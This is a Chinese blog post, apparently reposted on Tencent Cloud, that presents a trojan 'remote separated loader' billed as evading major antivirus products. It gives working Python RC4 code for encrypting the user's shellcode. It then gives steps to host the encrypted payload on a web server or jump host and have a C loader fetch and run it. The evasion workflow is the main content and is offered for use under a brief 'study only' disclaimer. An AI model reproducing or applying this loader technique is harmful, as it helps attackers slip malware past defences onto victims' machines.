【护网必备】木马免杀之远程分离加载器
项目介绍
此项目是一个简单的远程分离的加载器,免杀国内大部分杀软(360、火绒、Windows Defender、金山毒霸、电脑管家)
项目使用
Step 1:修改Encryption/payload_c_x64.py的24行,改为自己的shellcode
def rc4_encrypt(data, key):
S = list(range(256))
j = 0
# Key-scheduling algorithm (KSA)
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
# Pseudo-random generation algorithm (PRGA) & encryption
i = j = 0
result = bytearray()
for byte in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
k = S[(S[i] + S[j]) % 256]
result.append(byte ^ k)
return result
def main():
# 原始的payload(cale.exe)
payload = b"你的shellcode"
# 加密密钥
key = b"thisIsA16ByteKey" # 16字节密钥
# 使用RC4算法加密payload
encrypted_payload = rc4_encrypt(payload, key)
# 将加密的payload写入文件
with open("result.txt", "wb") as file:
file.write(encrypted_payload)
print("加密后的payload已写入result.txt")
if __name__ == "__main__":
main()Step 2:运行python脚本(环境python3.6)
Step 3:将生成的result.txt上传到Web端(OSS、跳板等机器)
Step 3:copy自己的地址,例如:http://example.org,随后将http://example.org替换ShellCodeLoader/Source.c 的152行,生成64位发行版即可
查杀测试
360查杀:
window defender查杀:
金山火绒查杀:
免责声明
项目仅供进行学习研究,切勿用于任何非法未授权的活动,如个人使用违反安全相关法律,后果与本人无关。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-06-19,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
相关产品与服务
腾讯云服务器利旧
云服务器(Cloud Virtual Machine,CVM)提供安全可靠的弹性计算服务。 您可以实时扩展或缩减计算资源,适应变化的业务需求,并只需按实际使用的资源计费。使用 CVM 可以极大降低您的软硬件采购成本,简化 IT 运维工作。